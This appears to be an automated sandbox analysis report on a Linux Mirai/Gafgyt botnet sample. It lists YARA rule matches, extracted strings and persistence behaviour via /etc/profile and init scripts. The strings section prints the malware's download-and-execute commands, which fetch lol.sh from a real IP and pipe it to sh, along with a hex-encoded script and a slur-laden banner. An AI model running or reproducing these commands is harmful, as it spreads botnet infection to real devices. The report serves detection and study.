Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpyth
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample	String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k94.156.227.233GET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- \| sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/x86_32.nn.elf (PID: 6308)

SIGKILL sent: pid: 6297, result: successful

Jump to behavior

Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: x86_32.nn.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal96.spre.troj.evad.linELF@0/9@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/x86_32.nn.elf (PID: 6238)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/x86_32.nn.elf (PID: 6238)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6289)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
